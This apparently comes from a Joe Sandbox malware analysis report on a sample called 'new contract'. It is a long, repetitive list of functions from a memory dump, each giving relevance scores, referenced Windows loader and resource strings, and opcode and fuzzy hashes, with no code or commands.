                                                                                                                                                                            • Instruction ID: 0a398b9a486c5a5bf0225e5e5000dc69d7b9e6412145924e78aa12db1d2e565e
                                                                                                                                                                            • Opcode Fuzzy Hash: d9e6ba07839b377f176e9890be0007851d0909889a9bc5cf72809e431c17770f
                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0C835680309ABE725DA4CDC56F96376DFB41B64F50005DF70467281D6B0AE40CA95
                                                                                                                                                                            Function 016303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: #%u
                                                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                                                            • Opcode ID: 9a346bbe9418ec5373f6945ef0aa304a8517e4eac99bc689d37cfe6935a6fe3c
                                                                                                                                                                            • Instruction ID: 685549cb593ec2771926c2a58dec1ec1f9e7366ab011f22a9d26d1efd6b86160
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a346bbe9418ec5373f6945ef0aa304a8517e4eac99bc689d37cfe6935a6fe3c
                                                                                                                                                                            • Instruction Fuzzy Hash: E2713772A0014A9FDB01DFA8CD94BAEB7F9AF48304F144169E905E7251EB34EE05CB64
                                                                                                                                                                            Function 0162A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrResSearchResource Enter, xrefs: 0162AA13
                                                                                                                                                                            • LdrResSearchResource Exit, xrefs: 0162AA25
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                                                            • Opcode ID: a3943bcffb2763472ffdccaefb8994743d7ed69e66bfcf80730d863d3db85c00
                                                                                                                                                                            • Instruction ID: 618d22072f1609f62344f4e33529d8eaaef1ecb43697eaf763fdd38b98e43a31
                                                                                                                                                                            • Opcode Fuzzy Hash: a3943bcffb2763472ffdccaefb8994743d7ed69e66bfcf80730d863d3db85c00
                                                                                                                                                                            • Instruction Fuzzy Hash: 3FE15D71A006299FEB229EDDCE90BAEBBBABF04710F10452AE901E7751D7B4D941CF50
                                                                                                                                                                            Function 016EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: `$`
                                                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                            • Instruction ID: 2d38147ae5ac134512bf80f73553ac4cc97d7a245de551955f9b82f04b1beb3f
                                                                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                            • Instruction Fuzzy Hash: 90C1BE312053429BEB24CF68CC49B6BBBE6AFD4318F084B2CF6968B290D774D509CB55
                                                                                                                                                                            Function 0169E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                                                            • Opcode ID: a625c97f2066984227a08832a626e0abd77f7ee96356637eca556e8311d086e3
                                                                                                                                                                            • Instruction ID: 2a9aedf3313bd3bfa16efd70506c8299a1cc45fb1fe74f4338e5e59dab337b4c
                                                                                                                                                                            • Opcode Fuzzy Hash: a625c97f2066984227a08832a626e0abd77f7ee96356637eca556e8311d086e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D615871E006199FDB24DFA88D40BAEBBB9FB48700F15406EE649EB291D732A941CB54
                                                                                                                                                                            Function 016C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$MUI
                                                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                                                            • Opcode ID: 1d8c1e4de66991b4f2b2b8729933d11e1396d357136e86ebb52e702b0400e63a
                                                                                                                                                                            • Instruction ID: c056c5a3f4c81e7dea5d1b4b5e34e84551fd0a940ec688050a5ce2a93b0c88c3
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8c1e4de66991b4f2b2b8729933d11e1396d357136e86ebb52e702b0400e63a
                                                                                                                                                                            • Instruction Fuzzy Hash: 285118B1D0021DAEDB11DFA9CC90AEEBBBDEB54B54F10452DE611B7290DB309D05CB64
                                                                                                                                                                            Function 016204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • kLsE, xrefs: 01620540
                                                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0162063D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                                                            • Opcode ID: ee716b6577eccfa8e74e3ebc6240e9cd353c07bb921e6cee2022ca05c2594448
                                                                                                                                                                            • Instruction ID: 048b9725adb6f53532aae7a806799023e76b46b75d431b980a183391b670d33a
                                                                                                                                                                            • Opcode Fuzzy Hash: ee716b6577eccfa8e74e3ebc6240e9cd353c07bb921e6cee2022ca05c2594448
                                                                                                                                                                            • Instruction Fuzzy Hash: 3F51AC71504B628BD734DF68C9446A7BBE8AF85304F10883EFA9A87341E7709545CF96
                                                                                                                                                                            Function 0162A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0162A2FB
                                                                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0162A309
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                            • API String ID: 0-2876891731
                                                                                                                                                                            • Opcode ID: a7099aa55a6fd6d8960ce774b2e137d6154d2767a83d556649c36d50a6fb3faa
                                                                                                                                                                            • Instruction ID: 0465d27b226ef08ee8e6f4db28c421a58d2d8a44baff0c57a6a9083ef9fb3821
                                                                                                                                                                            • Opcode Fuzzy Hash: a7099aa55a6fd6d8960ce774b2e137d6154d2767a83d556649c36d50a6fb3faa
                                                                                                                                                                            • Instruction Fuzzy Hash: 4541DC31A01A66CBDB21DF99CC40B6A7BB5FF84704F1441A9E900DB792E3B5C901CF85
                                                                                                                                                                            Function 0165A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                                                            • Opcode ID: 24cfea90321e27f502e415369654c1f6bd452f97bb88c057d68ce39639de9310
                                                                                                                                                                            • Instruction ID: aa13a0b5d36c44140aa569262b041b7c253c19f38813ba0917e0036e4f024631
                                                                                                                                                                            • Opcode Fuzzy Hash: 24cfea90321e27f502e415369654c1f6bd452f97bb88c057d68ce39639de9310
                                                                                                                                                                            • Instruction Fuzzy Hash: FE01D1B2250700AFD351DF64CE45B1677E8E794725F018A3DBA48CB190E374D804CB5A
                                                                                                                                                                            Function 0162C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: MUI
                                                                                                                                                                            • API String ID: 0-1339004836
                                                                                                                                                                            • Opcode ID: ba854c559cb887386123aead9ca30514fc79a3177196740be1df1691bddf76a9
                                                                                                                                                                            • Instruction ID: 049c84c69768d95e4aabb2cd8336e66534352bd6ed695f179f54de676eaad0ce
                                                                                                                                                                            • Opcode Fuzzy Hash: ba854c559cb887386123aead9ca30514fc79a3177196740be1df1691bddf76a9
                                                                                                                                                                            • Instruction Fuzzy Hash: 7D825B75E00A298FEB25CFA9CC80BEDBBB1BF49310F148169E959AB391D7349941CF50
                                                                                                                                                                            Function 016A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                                                                                                                                            • Instruction ID: ba69b71503f592f0185f437dbabc6a211e8203dffeb8b064576029a7b5222dfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 64a3ecccb63cab752f81a5f6c9c54af23b41d697e8b5c5ec3ba4e64810cb4836
                                                                                                                                                                            • Instruction Fuzzy Hash: D2918571900229AFEB21DF95CD85FAEBBB9EF54750F544059F600AB290D774AD00CFA4
                                                                                                                                                                            Function 016CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                            • Opcode ID: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                                                                                                                                            • Instruction ID: 312457e019b8ea4c13b605ed6c50d1b9caf2222f3cf833f2d1a35cc4a53a8f50
                                                                                                                                                                            • Opcode Fuzzy Hash: 1f2a696e4a98bc6565b4cd993c8b0cc7f67bf945ee22fe3af4d87b39050a7c45
                                                                                                                                                                            • Instruction Fuzzy Hash: 71918032900649AFDB22ABA5DC44FBFBF7AEF95B50F10001DF505A7250DB79A901CB94
                                                                                                                                                                            Function 0165A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: GlobalTags
                                                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                                                            • Opcode ID: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                                                                                                                                            • Instruction ID: 02266399b0c34ac0088afa6a14134d920c727ef52aab92bb37663ed34b9f140c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dc59f2b5f5ebcd3edafca3b2d982442a16fbf303d1a85de9825ce6375e97a67
                                                                                                                                                                            • Instruction Fuzzy Hash: 34716175E0031A9FDF28CF9CD990AADBBB6BF48710F14812EE505AB341E7709941CB64
                                                                                                                                                                            Function 016C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .mui
                                                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                                                            • Opcode ID: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                                                                                                                                            • Instruction ID: 6224b71b2a821c7e6d393af06109bbf9cece318540708d2ea8c32db5675947f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d6657af45f99a44a9a8b387dd4c9c13fb0e2026c0417506d96a333f2c5b40f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 66515B72D0062ADBDB10DF9DDC50ABEBBB5EF14A50F05416EEA12BB344DB349901CBA4
                                                                                                                                                                            Function 0163E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: EXT-
                                                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                                                            • Opcode ID: d4eefd381070602f294134dd0c29ee400c70e5173490fc17f85a7df75f2d34fc
                                                                                                                                                                            • Instruction ID: 2e7ae32af848a9b62020256354ac432c82c6660e512af330b5a8d728bb057231
                                                                                                                                                                            • Opcode Fuzzy Hash: d4eefd381070602f294134dd0c29ee400c70e5173490fc17f85a7df75f2d34fc
                                                                                                                                                                            • Instruction Fuzzy Hash: BE4190725083169BD721DA79CC40BABB7E9AFC8714F04092DFA84D7280E775D904C7A6
                                                                                                                                                                            Function 0169C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryHash
                                                                                                                                                                            • API String ID: 0-2202222882
                                                                                                                                                                            • Opcode ID: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                                                                                                                                            • Instruction ID: 07d74ccdc928cb216182d93a4fa40bb62033c7e22d1abca4410d4d496d7c992c
                                                                                                                                                                            • Opcode Fuzzy Hash: e407e4159fb1762b55d1f7f53b0de62bbe5015b6ad410d8764196e22344c8f27
                                                                                                                                                                            • Instruction Fuzzy Hash: DB4152B1D0012DABDF21DA50CD84FDEBB7DAB45714F0145E9EA08AB140DB709E89CFA8
                                                                                                                                                                            Function 016B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #
                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                            • Opcode ID: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                                                                                                                                            • Instruction ID: eca21c49a26bf361552eb2617068c7da79c96cac7ef37292f768cae4735a0d20
                                                                                                                                                                            • Opcode Fuzzy Hash: bf7c77692031e65d922e777b54f7bd12bc3fd1f5b1e8c2e5445e56f4e7c91536
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A311431A007199BEB22DB69CC90BEEBBB9DF55704F144068EA41AB382CB75DC85CB54
                                                                                                                                                                            Function 0169CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: BinaryName
                                                                                                                                                                            • API String ID: 0-215506332
                                                                                                                                                                            • Opcode ID: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                                                                                                                                            • Instruction ID: efe0c25bb890e6875b593147629f5c08cd16bf63db4b7acbb6d717aba6bd40a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 20955cefed4d9306394fc622b4a76d78fc378eae32909686b305f00f88b83924
                                                                                                                                                                            • Instruction Fuzzy Hash: F931E13690051AAFEF16DA59CC55E7FBB78EB80760F014169E905A7290D7309E05DBE0
                                                                                                                                                                            Function 016A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 016A895E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                            • API String ID: 0-702105204
                                                                                                                                                                            • Opcode ID: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                                                                                                                                            • Instruction ID: bf0888b5b4b0d8bb59fdbba4ac12d86207a0d109242233a501fc3cb8ceca0e98
                                                                                                                                                                            • Opcode Fuzzy Hash: b0aa048bc6cab2fc0e2a7496c4025cb998cb5b9d6f171f36e766e5116bcce01a
                                                                                                                                                                            • Instruction Fuzzy Hash: 900176B22042019FE7396B1DCC84A9ABF6AEFC6665B84002CF24103655CB20AC82CF96
                                                                                                                                                                            Function 016C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                                                                                                                                            • Instruction ID: edbe0fbeb6a1504840189c320f0cc8658dddd1217e21783138a9ea6b273326da
                                                                                                                                                                            • Opcode Fuzzy Hash: c0bf3aa31ad41576bed732cc09d32c002a906075c4cc6874537eeee8d356b196
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E42AE756093418BD725CF68CCA0A7BBBE6EB88B00F49492EFE8697350D770D845CB52
                                                                                                                                                                            Function 016B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
                                                                                                                                                                            • Instruction ID: 0fae13eb55e86683a6904f4e923e307642cd5b97e913fecd4e2ae17f97343bce
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e230e6a4ad771a089998457e767981002ab67c1ce26dec07c077687d7f760b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 79423D75A002198FEB25CF69CC81BEDBBFABF48300F158199E949AB342D7349985CF50
                                                                                                                                                                            Function 01632840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
                                                                                                                                                                            • Instruction ID: 51bed3936a298fddcbc158c6a1d9f0b3a81aa481e0065a2b30b09eacdec2d699
                                                                                                                                                                            • Opcode Fuzzy Hash: 028dfb44d9ef7ba0113e9285e8574d53ab4dfcf13e615b49f7fa8bfa6ec0b8a6
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E32CDB0A007558BEB25EF69CC547BEBBF2BF84704F24821DD54A9B385D735A842CB60
                                                                                                                                                                            Function 016CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
                                                                                                                                                                            • Instruction ID: 4cdaece25a467ce2d5fbb26de3531066580164eb8b3005942edfc139a0aadc8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b8dab14bb56f4e89d863e8368984b4d9e5fe6b1fb34fb415951b3973d769b5b
                                                                                                                                                                            • Instruction Fuzzy Hash: BF22BD746046698BEB25CFA9C894372BBF1EF44B00F08C55EE9868B386F335D452DB60
                                                                                                                                                                            Function 01626A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
                                                                                                                                                                            • Instruction ID: 6602ce2abc5f35f0198ec553c997d315504bc7d816c6c46a7eb3863ae9317387
                                                                                                                                                                            • Opcode Fuzzy Hash: 465ea72dca7dc30df45932b5e8438639f22abf4d01696cf604a71f9169cd2664
                                                                                                                                                                            • Instruction Fuzzy Hash: 1032BE71A05615CFDB25DF68C880BAABBF2FF48310F148669E956AB391D730E842CF50
                                                                                                                                                                            Function 01644A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                            • Instruction ID: 7a2bd0764b520999af89febe64797489f0b22b2ab2f5cdb25086f6f1cdd2ad5e
                                                                                                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                            • Instruction Fuzzy Hash: 43F17171E0021A9BDF15DF99CD81BAEBBF6BF48710F098169E945AB340EB34D841CB64
                                                                                                                                                                            Function 016B892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
